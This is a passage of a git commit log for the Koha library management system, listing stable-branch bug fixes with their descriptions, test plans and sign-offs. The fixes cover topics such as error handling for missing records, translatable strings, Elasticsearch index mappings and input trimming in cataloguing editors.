biblionumber=<invalid_number> (e.g. a deleted biblionumber) Koha explodes
with a message << Can't call method "metadata" on an undefined value at
/kohadevbox/koha/catalogue/labeledMARCdetail.pl line 59 >>

Test plan:
==========
1. Activate the viewLabeledMARC syspref.
2. Try to open a biblio record in Labeled MARC view, giving as a biblionumber
   (in URL) a non-existing biblionumber, e.g. in ktd, with standard ktd
   test data:
   http://your_ktd:8081/cgi-bin/koha/catalogue/labeledMARCdetail.pl?biblionumber=1234567
   Koha should explode with the message:
   Can't call method "metadata" on an undefined value at
   /kohadevbox/koha/catalogue/labeledMARCdetail.pl line 59
3. Apply the patch; restart_all.
4. Repeat p. 2.  You should get a regular page with the info "The record you
   requested does not exist (1234567)".

Signed-off-by: Roman Dolny <roman.dolny@jezuici.pl>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit e4e54af0e77a01d8ad1ee6ac84f5b255951f1831)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 944f3ffc8f0f59b2080d0670f4691a2343413e50)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36872: Untranslatable strings in request.tt
Owen Leonard [Thu, 16 May 2024 12:52:04 +0000 (12:52 +0000)]
Bug 36872: Untranslatable strings in request.tt

There are errors in the JavaScript in the holds template in the staff
client which results in strings not being translatable. This patch
corrects the errors.

To test, apply the patch and run through the process of placing a hold
on multiple items in the staff interface.

- At the hold confirmation step, try to submit the form without
  selecting pickup locations for one or more titles.
- You should get an alert, "Please make sure all selected titles have a
  pickup location set".
- Uncheck the checkboxes next to each title you're placing a hold on.
- Submit the form. You should get an error: "Please select at least one
  title".

- Test the translation process with a language, e.g. fr-FR:
- In KTD, run: gulp po:update --lang fr-FR
- Check fr-FR-staff-prog.po for the line referring to
  koha-tmpl/intranet-tmpl/prog/en/modules/reserve/request.tt:1499
- You should see the string "Please make sure all selected titles have a
  pickup location set".

Signed-off-by: Caroline Cyr La Rose <caroline.cyr-la-rose@inlibro.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 537c960777f94cf964c757ed2773f330612ae3c7)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 4a51f8ca4ae772d5b3f9f06605aa72980ef49a19)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36529: manage_additional_fields permission for more than acquisitions and serials
Caroline Cyr La Rose [Fri, 12 Apr 2024 09:53:25 +0000 (05:53 -0400)]
Bug 36529: manage_additional_fields permission for more than acquisitions and serials

This patch renames the manage_additional_fields permission to remove
the specificity of acquisitions orders and serial subscriptions.
Since each additional field requires a corresponding permission, I
wrote each of them next to it. It makes it very long, but right now
there isn't really a way to link permissions other than the permission
description.

To test:
1. Apply patch
2. Go to a patron account
3. Click More > Set permissions
4. Go to the Administration panel permissions and open the
   sub-permissions
5. Check that the manage_additional_fields permission description
   makes sense, check grammar and spelling, try the various
   combinations

Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit e251212ff5f783ff7d5d9de3821510ba7928d95f)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit fd982c027ddf247e441f2db278145b54f7dc537c)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36793: Fix case of $var in Context->delete_preference
Marcel de Rooy [Mon, 6 May 2024 12:28:45 +0000 (12:28 +0000)]
Bug 36793: Fix case of $var in Context->delete_preference

This only applies to 'local' preferences.

Test plan (first without this patch):
Add a local pref. Delete it. Ask value on commandline with:
* perl -MC4::Context -e"print C4::Context->preference('YOUR_PREF')"
* Did you replace YOUR_PREF :)

Now repeat with this patch. And verify fix (no value now).

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 8ea126b1f89e24a2baf8c43f7bf837bf74741088)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 6122b60194af5b6939a6bbae6bc3c7973835b309)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36793: Unit test
Marcel de Rooy [Mon, 6 May 2024 12:28:45 +0000 (12:28 +0000)]
Bug 36793: Unit test

This only applies to 'local' preferences.

Test plan:
Run sysprefs.t with/without second patch.

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit b77cb006f1b1145b0251579e4122b7ad0c1bd0c1)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit d39200e0d631cf5f008cbd8d185319d847a595f7)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36619: Restore 'Columns' visibility on the patron search when placing a hold
Jonathan Druart [Wed, 17 Apr 2024 10:18:11 +0000 (12:18 +0200)]
Bug 36619: Restore 'Columns' visibility on the patron search when placing a hold

Test plan:
Go to /cgi-bin/koha/reserve/request.pl?biblionumber=117
Search for "d"
Notice that with this patch applied the "Columns" button is back and
that the "Configure" is working correctly

Signed-off-by: Caroline Cyr La Rose <caroline.cyr-la-rose@inlibro.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 76ebbb4b9b3a39c6e7ffffe8ad1b9b2c603daf5c)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit b485b949f4207ffa7b8651858ba4850557734042)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 35961: (follow-up) Pass along the borrowernumber
Lucas Gass [Mon, 13 May 2024 22:15:02 +0000 (22:15 +0000)]
Bug 35961: (follow-up) Pass along the borrowernumber

To test:
1. APPLY PATCH
2. Turn on OpacCatalogConcerns
3. Find a record and go to the OPAC detail page.
4. Click "Report a concern" in the right navigation menu
5. Make sure it works
6. Repeat the process from MARC view and ISBD view pages

Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit e412a4387c888816cf478d811a559c5f57f7e9e2)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit dc8fb79cf4438f31cf72942caccf4a7d6c9bd665)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 35961: Add missing includes
Martin Renvoize [Mon, 13 May 2024 13:43:53 +0000 (14:43 +0100)]
Bug 35961: Add missing includes

This patch adds the missing includes for the 'Catalog concerns' modal on
opac-MARCdetail and opac-ISBDdetail views.

Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit c2154173af06efaf007e0cdf444f885275d61f1b)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit e90c544841efed6cf31ec8433f2e79161a07095f)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36837: Simplify XSLT and aid translatability
Tomas Cohen Arazi [Mon, 13 May 2024 13:58:48 +0000 (10:58 -0300)]
Bug 36837: Simplify XSLT and aid translatability

This patch makes the XSLT contain HTML tags instead of building them
from scratch with static attribute values. This made it awkward for
translators as CSS classes ended up being extracted for translation
purposes. Plus, there's no need to spend CPU cycles on static content
generation.

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 48e39c1e5cea2db2c4e0951a6efcae7e611490fb)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 22ff328708b377b4599bd072a9b444bae5953fa3)

5 months ago Bug 33099: Add missing MARC21 Match authority mappings so "Search all headings" searc...
Janusz Kaczmarek [Tue, 18 Apr 2023 19:42:24 +0000 (21:42 +0200)]
Bug 33099: Add missing MARC21 Match authority mappings so "Search all headings" search works

The main entry form of corporate names (110), uniform titles (130), topical
terms (150), geographical names (151), and genre/form (155) are not indexed
with 'Match' search field in Elasticsearch standard mapping.  As a result,
the respective records are not present on the result list when performing
an 'All headings' search for the authority records with the main heading form
(MARC 21).

Test plan
=========
0. Have a test installation with Elasticsearch.
1. In Authorities, make an 'All headings' search for a main entry
   form from the corporate names, uniform titles, topical terms,
   geographical names, or genre/form
   --> e.g., in ktd: UK Archiving.  You will get no results.
2. Apply the patch, reindex with:
   sudo koha-elasticsearch --rebuild -r -a kohadev
3. Repeat the test. You should see 'UK Archiving' on the result list.

Signed-off-by: Roman Dolny <roman.dolny@jezuici.pl>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit d4c70f7d07dcc0fe1319b6e0380abcd1b7400b95)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 5e405a29a8b5af3daf8c51f814844086d828e63a)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36378: Cannot stay logged in if AutoLocation is enabled but branch ip is not...
Kyle M Hall [Wed, 20 Mar 2024 19:32:50 +0000 (15:32 -0400)]
Bug 36378: Cannot stay logged in if AutoLocation is enabled but branch ip is not set correctly

We can get into a scenario where a user cannot stay logged in for more than a single page load.
If AutoLocation is enabled with branch IP addresses being set to a space, you will be logged out with every page load.

Test Plan:
1) Set your branch ip to a space
2) Enable AutoLocation
3) Restart all the things!
4) Log out
5) Log in
6) Browse to another page
7) You are logged out
8) Apply patch
9) Repeat 1-6
10) You are not logged out!

Signed-off-by: Andrew Fuerste Henry <andrewfh@dubcolib.org>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 7291a312332e4fac7ac61288f33a001d4a7b306c)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit d3dd7d20f1eae2bed24bb6833d08b4c80b4a250f)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36723: Add musical presentation to Elasticsearch index mappings
danyonsewell [Fri, 10 May 2024 02:40:45 +0000 (02:40 +0000)]
Bug 36723: Add musical presentation to Elasticsearch index mappings

Testing plan:

1. Start up KTD with Elasticsearch: ktd --es8 up
2. Apply the patch and restart everything (restart_all).
3. Reset the mappings: Administration > Catalog > Search engine configuration (Elasticsearch) > Reset mappings (at the bottom of the page)
4. Reindex: koha-elasticsearch --rebuild -d -b -a kohadev
5. Alternative to steps 3 and 4: reset_all
6. Update the visibility for 254$a in the default framework so that it is visible in the Editor (OPAC, Staff interface should already be selected).
7. Add a new record using the default framework and put a term in 254$a, such as 'Full score'.

Sponsored-by: Education Services Australia SCIS
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit fffb3665eadec04792b055e9ba04152b3b36d6dd)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 58052b46f4365b0d5c6729b80a84b7f13ebe6b34)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 34823: Do not show Item group dropdown if there are no item groups
Lucas Gass [Wed, 6 Mar 2024 18:41:04 +0000 (18:41 +0000)]
Bug 34823: Do not show Item group dropdown if there are no item groups

To test:
1. Enable EnableItemGroups and EnableItemGroupHolds
2. Go to the OPAC and log in as a patron
3. Go to any record that doesn't have grouped items and try to place a hold
4. Click on "Show more options"
5. See "Request specific item group:" and dropdown
6. APPLY PATCH
7. Try again, this time if the record has no item groups you should not see the dropdown at all.

Signed-off-by: Caroline Cyr La Rose <caroline.cyr-la-rose@inlibro.com>
Signed-off-by: Emily Lamancusa <emily.lamancusa@montgomerycountymd.gov>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit be98d633be1fb34f52ccc8b57b18280856cf1d1a)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 58c25f1c78091c714e24710ca65b8989f02c80b4)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36794: Illegitimate modification of biblionumber subfield content (999 $c)
Janusz Kaczmarek [Mon, 6 May 2024 13:24:10 +0000 (13:24 +0000)]
Bug 36794: Illegitimate modification of biblionumber subfield content (999 $c)

It happens that librarians, by mistake, open a biblio editor putting in the
URL, by hand, the biblionumber prefixed with a blank (e.g.
.../addbiblio.pl?biblionumber= 123 -- mind the space before 123).
In such a case the editor opens with the right biblio record (i.e. 123)
but, after saving the record, the content of the biblionumber MARC
field (999 $c for a standard MARC 21 installation) results modified and
contains additional initial blanks.

Moreover, while using ES and making a search for the record (with title,
author etc.) we get two records on the result list (instead of one).

This is because in the addbiblio.pl script $biblionumber is taken (and
continuously used) directly from CGI parameter, without any
validation and/or correction.

Test plan:
==========
0. Have a test installation with ES.
1. Open a biblio record in the editor with an added space before
   biblionumber value, e.g.:
   http://ktd:8081/cgi-bin/koha/cataloguing/addbiblio.pl?biblionumber= 123
   Save the record.
2. From the Normal view choose Save -> MARCXML.  Open the saved file in
   your favourite editor.  You should see, at the end, something like:
   <datafield tag="999" ind1=" " ind2=" ">
     <subfield code="c"> 123</subfield>
   (mind the space before 123).
   This is not right.
3. Make a search with the title or author's name from the record (e.g.
   Henning Mankell for the record 123 from the default ktd data set).
   You should get two records instead of one (while using ES).
4. Apply the patch, restart_all.  Repeat p. 1 and 2 with a different
   biblionumber.  Notice the unchanged (i.e. without spaces) value
   of 999 $c subfield in the exported record and only one record
   as a result of a search.

WNC amended patch - rebased, added conditional in case no bib, moved comments to their own lines

Sponsored-by: Ignatianum University in Cracow
Signed-off-by: Roman Dolny <roman.dolny@jezuici.pl>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit c74169ba27c2e12473239b15358e428bc05da9f5)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 076b82d52036a4779ff762319586dcba24e72cbf)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36799: Illegitimate modification of MARC authid field content (001)
Janusz Kaczmarek [Tue, 7 May 2024 09:13:54 +0000 (09:13 +0000)]
Bug 36799: Illegitimate modification of MARC authid field content (001)

It happens that librarians to save time open an authority editor by putting
in the URL, by hand, the authid prefixed, by mistake, with a blank (e.g.
.../authorities.pl?authid= 100 -- mind the space before 100).  In
such a case the editor opens with the right auth record (i.e. 100) but,
after saving the record, the content of the authid MARC field (001 for
a standard MARC 21 installation) results modified and contains
additional initial blanks.

Moreover, if the heading (1XX field) was modified in the authority record
during such an edit, the changes will not propagate to the linked
bibliographic records.  And won't in the future.

This is because in the authorities.pl script $authid is taken (and
continuously used) directly from CGI parameter, without any
validation and/or correction (line 540 in the current main branch).

Test plan:
==========
1. Open an auth record in the editor with an added space before
   authid value, e.g.:
   http://ktd:8081/cgi-bin/koha/authorities/detail.pl?authid= 100
   Modify the heading field -- in the ktd data set:
       150 Computerized typesetting
   Save the record.
2. a) Open the record for editing again--see the space added before
   the authid in field 001.  Close the editor (with Cancel).
   b) Try to go to the linked biblio records with Used in X records.
   Note no results, if using ES.
   c) Remove the space before authid (after an:) in the URL.
   Go to the linked biblio records.  See that the content of
   the field controlled by the modified auth record did not
   update.
3. Apply the patch; restart_all.
4. Repeat p. 1 and 2 with a different authid.  Everything should
   be OK now.

Sponsored-by: Ignatianum University in Cracow
Signed-off-by: Roman Dolny <roman.dolny@jezuici.pl>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 4b66fbc4ebc0fe706f9a9b9057a19ee0c1b13aa3)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 65e1816bbaa83ff88800d9dd9a3eddb208eb31a7)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 33849: Do not reset new patrons home library when error occurs
Emmi Takkinen [Thu, 4 Apr 2024 06:04:47 +0000 (09:04 +0300)]
Bug 33849: Do not reset new patrons home library when error occurs

While adding a new patron, if the patron is flagged as a duplicate
or another error occurs and their home library differs from
the library the user is logged in to, the patron's home library resets to
the logged-in user's library. This happens with all patrons
except those with category type C. This patch removes the check
for whether the patron's category type is C from the code so that all
category types use the previously chosen home library even if an error occurs.

To test:
1. Add new patron and set their library to a different
library than the one you're logged in.
2. Cause an error (wrong age, duplicate etc) while saving.
3. Attempt to save.
=> Note that the patron's home library is set to the one you're
logged in to.
4. Apply this patch.
5. Repeat steps 1 to 3.
=> Note that the patron's home library hasn't changed.

Sponsored-by: Koha-Suomi Oy
Signed-off-by: Esther <esther@bywatersolutions.com>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit d2f41df188c3d8e8d8705c6a5ceb583e3e29e629)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 3c52b89167018f79456a3308cdd5f7266856ef5f)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 35927: Selecting MARC framework again doesn't work when adding to basket from...
Fridolin Somers [Mon, 29 Jan 2024 09:08:00 +0000 (10:08 +0100)]
Bug 35927: Selecting MARC framework again doesn't work when adding to basket from an external source

Like Bug 19372, selecting MARC framework currently doesn't work when adding to basket from an external source.
Strangely I can reproduce on koha-testing-docker, but we have this issue with a Ubuntu Focal install.
Looks like it comes from a bad syntax that needs to be replaced in any case.

Test plan:
1) Add an order to a basket from an external source
2) Select another framework than the default one on the search result
   view. Before doing 'add order' on chosen search result line.
3) Check the framework code you will pick will be used in the created biblio record

Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit b7a5cc5beeb4af7cd23a414519c038f007f5b959)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 71b9421451dce017c12b82f34240431d4069a288)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36335: Fix ILS-DI GetRecords bad encoding for UNIMARC
Fridolin Somers [Fri, 15 Mar 2024 15:02:11 +0000 (16:02 +0100)]
Bug 36335: Fix ILS-DI GetRecords bad encoding for UNIMARC

ILS-DI GetRecords generates bad encoding of MARCXML for UNIMARC, like OAI in Bug 34467

Enable ILS-DI and display a record with :
<opac url>/cgi-bin/koha/ilsdi.pl?service=GetRecords&id=<biblionumber>

Well-known issue, fixed
Signed-off-by: Frédéric Demians <f.demians@tamil.fr>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 5406aaedfa86aa97ed06019f4862bff285a4aad2)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 6568275bc9abec733ca6c914992b705da7bc3934)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 34041: (follow-up) escape double dashes to prevent issues
Tomas Cohen Arazi [Fri, 10 May 2024 12:30:53 +0000 (09:30 -0300)]
Bug 34041: (follow-up) escape double dashes to prevent issues

Having double dashes inside a commented block is not valid XML. This
patch restores it, with an added message explaining it.

To test:
1. Run:
   $ xmllint etc/z3950/config.xml
=> FAIL: You get:
etc/z3950/config.xml:5: parser error : Double hyphen within comment: <!--
  <config>
      <z3950_responder_options>
      <z3950_responder_options>--add-item-status k -t 5</z3950_responder_options
2. Apply this patch
3. Repeat 1
=> SUCCESS: All good!

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 11c69496bcd216ad264acd87409e5160c73995bf)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit afb9cd8e1ccf941ae8cf6e1070dd41a285dcb86b)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>